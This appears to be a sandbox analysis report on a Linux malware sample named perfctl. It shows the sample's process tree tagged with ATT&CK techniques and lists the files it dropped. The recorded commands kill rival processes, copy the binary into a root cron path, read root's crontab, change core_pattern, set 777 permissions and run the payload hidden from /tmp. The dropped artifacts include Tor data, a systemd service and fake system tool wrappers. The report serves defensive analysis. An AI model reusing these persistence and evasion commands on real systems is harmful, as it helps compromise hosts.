    • Command and Scripting Interpreter: Unix Shell
    PID:3546
    • /usr/bin/who
      who
      3⤵
      PID:3547
    • /usr/bin/wc
      wc -l
      3⤵
      PID:3548
  • /bin/sh
    /bin/sh -c "killall -9 perfctl;pkill -9 perfctl"
    2⤵
    • Command and Scripting Interpreter: Unix Shell
    PID:3549
    • /usr/bin/killall
      killall -9 perfctl
      3⤵
      • Reads runtime system information
      PID:3550
    • /usr/bin/pkill
      pkill -9 perfctl
      3⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:3553
  • /bin/sh
    /bin/sh -c "ps -ax|grep perfctl|grep -v grep|awk '{print \$1}'|xargs kill -9"
    2⤵
    PID:3627
    • /usr/bin/ps
      ps -ax
      3⤵
      • Reads CPU attributes
      • Enumerates kernel/hardware configuration
      • Reads runtime system information
      PID:3631
    • /usr/bin/grep
      grep perfctl
      3⤵
      PID:3636
    • /usr/bin/grep
      grep -v grep
      3⤵
      PID:3637
    • /usr/bin/awk
      awk "{print \$1}"
      3⤵
      PID:3640
    • /usr/bin/xargs
      xargs kill -9
      3⤵
      PID:3643
      • /tmp/.perf.c/kill
        kill -9
        4⤵
        PID:3687
      • /tmp/kill
        kill -9
        4⤵
        PID:3687
      • /usr/local/sbin/kill
        kill -9
        4⤵
        PID:3687
      • /usr/local/bin/kill
        kill -9
        4⤵
        PID:3687
      • /usr/sbin/kill
        kill -9
        4⤵
        PID:3687
      • /usr/bin/kill
        kill -9
        4⤵
        PID:3687
                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                              /bin/sh -c "killall -9 obfs4proxy;pkill -9 obfs4proxy"
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                              PID:3688
                                                                                                                                                                                                                                                                                                              • /usr/bin/killall
                                                                                                                                                                                                                                                                                                                killall -9 obfs4proxy
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                                                                                                                                                                PID:3689
                                                                                                                                                                                                                                                                                                              • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                pkill -9 obfs4proxy
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                • Enumerates kernel/hardware configuration
                                                                                                                                                                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                                                                                                                                                                PID:3690
                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                              /bin/sh -c "ps -ax|grep obfs4proxy|grep -v grep|awk '{print \$1}'|xargs kill -9"
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:3693
                                                                                                                                                                                                                                                                                                                • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                  ps -ax
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                                                                                                                                  PID:3694
                                                                                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                  grep obfs4proxy
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:3695
                                                                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                    grep -v grep
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:3696
                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                      awk "{print \$1}"
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:3697
                                                                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                        xargs kill -9
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:3698
                                                                                                                                                                                                                                                                                                                          • /tmp/.perf.c/kill
                                                                                                                                                                                                                                                                                                                            kill -9
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                              PID:3703
                                                                                                                                                                                                                                                                                                                            • /tmp/kill
                                                                                                                                                                                                                                                                                                                              kill -9
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                PID:3703
                                                                                                                                                                                                                                                                                                                              • /usr/local/sbin/kill
                                                                                                                                                                                                                                                                                                                                kill -9
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                  PID:3703
                                                                                                                                                                                                                                                                                                                                • /usr/local/bin/kill
                                                                                                                                                                                                                                                                                                                                  kill -9
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                    PID:3703
                                                                                                                                                                                                                                                                                                                                  • /usr/sbin/kill
                                                                                                                                                                                                                                                                                                                                    kill -9
                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                      PID:3703
                                                                                                                                                                                                                                                                                                                                    • /usr/bin/kill
                                                                                                                                                                                                                                                                                                                                      kill -9
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                        PID:3703
                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                                    sh -c "rm -f /tmp/.xdiag/tordata/torrc-* 2>/dev/null"
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:3704
                                                                                                                                                                                                                                                                                                                                      • /usr/bin/rm
                                                                                                                                                                                                                                                                                                                                        rm -f "/tmp/.xdiag/tordata/torrc-*"
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:3705
                                                                                                                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                                                                                                                        /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                        PID:3706
                                                                                                                                                                                                                                                                                                                                        • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                          who
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:3707
                                                                                                                                                                                                                                                                                                                                          • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                            wc -l
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:3708
                                                                                                                                                                                                                                                                                                                                          • /bin/sh
                                                                                                                                                                                                                                                                                                                                            /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                            PID:3710
                                                                                                                                                                                                                                                                                                                                            • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                              who
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:3711
                                                                                                                                                                                                                                                                                                                                              • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                wc -l
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:3712
                                                                                                                                                                                                                                                                                                                                              • /bin/sh
                                                                                                                                                                                                                                                                                                                                                /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                PID:3713
                                                                                                                                                                                                                                                                                                                                                • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                  who
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:3714
                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                    wc -l
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                      PID:3715
                                                                                                                                                                                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                                                                                                                                                                                    /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                    PID:3716
                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                      who
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                        PID:3717
                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                        wc -l
                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                          PID:3718
                                                                                                                                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                                                                                                                                        /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                        PID:3719
                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                          who
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                            PID:3720
                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                            wc -l
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:3721
                                                                                                                                                                                                                                                                                                                                                          • /bin/sh
                                                                                                                                                                                                                                                                                                                                                            /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                            PID:3722
                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                              who
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:3723
                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                wc -l
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:3724
                                                                                                                                                                                                                                                                                                                                                              • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                PID:3725
                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                  who
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:3726
                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                    wc -l
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:3727
                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                    chmod -R 777 /tmp/.xdiag/data
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                    • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                    • Modifies special file permissions
                                                                                                                                                                                                                                                                                                                                                                    PID:3728
                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/getent
                                                                                                                                                                                                                                                                                                                                                                    getent passwd 0
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                    • Disables SELinux
                                                                                                                                                                                                                                                                                                                                                                    PID:3729
                                                                                                                                                                                                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                    /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                    PID:3730
                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                      who
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:3731
                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                        wc -l
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:3732
                                                                                                                                                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                        /bin/sh -c "cp /proc/2500/exe /root/.config/cron/perfcc && chmod +x /root/.config/cron/perfcc"
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                        • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                        PID:3733
                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/cp
                                                                                                                                                                                                                                                                                                                                                                          cp /proc/2500/exe /root/.config/cron/perfcc
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:3734
                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                            chmod +x /root/.config/cron/perfcc
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                            • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                            • Modifies special file permissions
                                                                                                                                                                                                                                                                                                                                                                            PID:3735
                                                                                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                          /bin/sh -c "find /var/spool/cron/crontabs -type f 2>/dev/null|grep cron|grep '/root\$'|xargs cat"
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                          PID:3736
                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/find
                                                                                                                                                                                                                                                                                                                                                                            find /var/spool/cron/crontabs -type f
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:3737
                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                              grep cron
                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:3738
                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                grep "/root\$"
                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:3739
                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                  xargs cat
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:3740
                                                                                                                                                                                                                                                                                                                                                                                    • /tmp/.perf.c/cat
                                                                                                                                                                                                                                                                                                                                                                                      cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:3741
                                                                                                                                                                                                                                                                                                                                                                                      • /tmp/cat
                                                                                                                                                                                                                                                                                                                                                                                        cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:3741
                                                                                                                                                                                                                                                                                                                                                                                        • /usr/local/sbin/cat
                                                                                                                                                                                                                                                                                                                                                                                          cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:3741
                                                                                                                                                                                                                                                                                                                                                                                          • /usr/local/bin/cat
                                                                                                                                                                                                                                                                                                                                                                                            cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:3741
                                                                                                                                                                                                                                                                                                                                                                                            • /usr/sbin/cat
                                                                                                                                                                                                                                                                                                                                                                                              cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:3741
                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:3741
                                                                                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                              /bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                              PID:3742
                                                                                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                              /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
  • Command and Scripting Interpreter: Unix Shell
  PID:3743
    • /usr/bin/who
      who
      3⤵
      PID:3744
    • /usr/bin/wc
      wc -l
      3⤵
      PID:3745
• /bin/sh
  /bin/sh -c "who | wc -l"
  2⤵
  • Command and Scripting Interpreter: Unix Shell
  PID:3746
    • /usr/bin/who
      who
      3⤵
      PID:3747
    • /usr/bin/wc
      wc -l
      3⤵
      PID:3748
• /bin/sh
  /bin/sh -c "who | wc -l"
  2⤵
  • Command and Scripting Interpreter: Unix Shell
  PID:3749
    • /usr/bin/who
      who
      3⤵
      PID:3750
    • /usr/bin/wc
      wc -l
      3⤵
      PID:3751
• /bin/sh
  /bin/sh -c "who | wc -l"
  2⤵
  • Command and Scripting Interpreter: Unix Shell
  PID:3752
    • /usr/bin/who
      who
      3⤵
      PID:3753
    • /usr/bin/wc
      wc -l
      3⤵
      PID:3754
• /bin/sh
  /bin/sh -c "who | wc -l"
  2⤵
  • Command and Scripting Interpreter: Unix Shell
  PID:3755
    • /usr/bin/who
      who
      3⤵
      PID:3756
    • /usr/bin/wc
      wc -l
      3⤵
      PID:3757
• /bin/sh
  /bin/sh -c "who | wc -l"
  2⤵
  • Command and Scripting Interpreter: Unix Shell
  PID:3758
    • /usr/bin/who
      who
      3⤵
      PID:3759
    • /usr/bin/wc
      wc -l
      3⤵
      PID:3760
• /usr/bin/chmod
  chmod -R 755 /tmp/.xdiag
  2⤵
  • File and Directory Permissions Modification
  • Modifies special file permissions
  PID:3761
• /usr/bin/chmod
  chmod -R 777 /tmp/.xdiag/data
  2⤵
  • File and Directory Permissions Modification
  • Modifies special file permissions
  PID:3762
• /bin/sh
  /bin/sh -c "who | wc -l"
  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3763
                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                                                                        who
                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3764
                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                                                                          wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3765
                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                          /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3766
                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                                                                            who
                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3767
                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                                                                              wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3768
                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                              /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3769
                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                                                                                who
                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3770
                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                                                                                  wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3771
                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                  /bin/sh -c "PATH=/tmp/.perf.c:\$PATH;export AAPCRK=c1cH3IVckE39;nohup perfctl >/dev/null 2>/dev/null & exit"
                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3772
                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/nohup
                                                                                                                                                                                                                                                                                                                                                                                                                                    nohup perfctl
                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3773
                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                    /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3780
                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                                                                                      who
                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3781
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                                                                                        wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3782
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                        /bin/sh -c "cp /proc/2500/exe /root/.config/cron/perfcc && chmod +x /root/.config/cron/perfcc"
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3783
                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/cp
                                                                                                                                                                                                                                                                                                                                                                                                                                          cp /proc/2500/exe /root/.config/cron/perfcc
      3⤵
      PID:3784
    • /usr/bin/chmod
      chmod +x /root/.config/cron/perfcc
      3⤵
      • File and Directory Permissions Modification
      • Modifies special file permissions
      PID:3785
  • /bin/sh
    /bin/sh -c "find /var/spool/cron/crontabs -type f 2>/dev/null|grep cron|grep '/root\$'|xargs cat"
    2⤵
    • Command and Scripting Interpreter: Unix Shell
    PID:3786
    • /usr/bin/find
      find /var/spool/cron/crontabs -type f
      3⤵
      PID:3787
    • /usr/bin/grep
      grep cron
      3⤵
      PID:3788
    • /usr/bin/grep
      grep "/root\$"
      3⤵
      PID:3789
    • /usr/bin/xargs
      xargs cat
      3⤵
      PID:3790
      • /tmp/.perf.c/cat
        cat /var/spool/cron/crontabs/root
        4⤵
        PID:3791
      • /tmp/cat
        cat /var/spool/cron/crontabs/root
        4⤵
        PID:3791
      • /usr/local/sbin/cat
        cat /var/spool/cron/crontabs/root
        4⤵
        PID:3791
      • /usr/local/bin/cat
        cat /var/spool/cron/crontabs/root
        4⤵
        PID:3791
      • /usr/sbin/cat
        cat /var/spool/cron/crontabs/root
        4⤵
        PID:3791
      • /usr/bin/cat
        cat /var/spool/cron/crontabs/root
        4⤵
        PID:3791
  • /bin/sh
    /bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"
    2⤵
    • Command and Scripting Interpreter: Unix Shell
    PID:3792
  • /bin/sh
    /bin/sh -c "who | wc -l"
    2⤵
    • Command and Scripting Interpreter: Unix Shell
    PID:3793
    • /usr/bin/who
      who
      3⤵
      PID:3794
    • /usr/bin/wc
      wc -l
      3⤵
      PID:3795
• /tmp/.perf.c/perfctl
  perfctl
  1⤵
  • Executes dropped EXE
  • Checks hardware identifiers (DMI)
  • Reads hardware information
  • Checks CPU configuration
  • Reads CPU attributes
  • Enumerates kernel/hardware configuration
  • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3773

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /etc/cron.daily/perfclean

    Filesize

    17B

  • /etc/selinux/sedpOZdAO

    Filesize

    582B

  • /etc/systemd/system/kmodaudit.service

    Filesize

    279B

  • /root/.config/cron/perfcc

    Filesize

    8.9MB

  • /root/sedw5OZjn

    Filesize

    214B

  • /tmp/.apid

    Filesize

    4B

  • /tmp/.perf.c/perfctl

    Filesize

    1.6MB

  • /tmp/.xdiag/cp

    Filesize

    36B

  • /tmp/.xdiag/cty

    Filesize

    6B

  • /tmp/.xdiag/elog

    Filesize

    105B

  • /tmp/.xdiag/exi

    Filesize

    13B

  • /tmp/.xdiag/hroot/hscheck

    Filesize

    7B

  • /tmp/.xdiag/hs.txt

    Filesize

    67B

  • /tmp/.xdiag/p

    Filesize

    4B

  • /tmp/.xdiag/tordata/control_auth_cookie.tmp

    Filesize

    32B

  • /tmp/.xdiag/tordata/ts

    Filesize

    10B

  • /tmp/.xdiag/uid

    Filesize

    1B

  • /tmp/.xdiag/ver

    Filesize

    18B


  • /tmp/lgctr

    Filesize

    1KB


  • /tmp/lgctr2

    Filesize

    33B


  • /tmp/libgcwrap.so

    Filesize

    78KB


  • /usr/bin/.local/bin/crontab

    Filesize

    15KB


  • /usr/bin/.local/bin/ldd

    Filesize

    15KB


  • /usr/bin/.local/bin/lsof

    Filesize

    15KB

  • /usr/bin/.local/bin/top

    Filesize: 15KB

  • /usr/bin/wizlmsh

    Filesize: 10KB

  • /usr/share/initramfs-tools/hooks/sed3N6ijn

    Filesize: 15KB

  • /usr/share/initramfs-tools/hooks/sedYbzyNC

    Filesize: 1KB

  • /var/spool/cron/crontabs/tmp.RuiXWi

    Filesize: 212B

  • memory/2478-1-0x0000000000400000-0x0000000001722d48-memory.dmp

  • memory/2486-2-0x0000000000400000-0x0000000001722d48-memory.dmp

  • memory/2500-3-0x0000000000400000-0x0000000001722d48-memory.dmp

  • memory/3773-4-0x0000000000400000-0x0000000000ae87b8-memory.dmp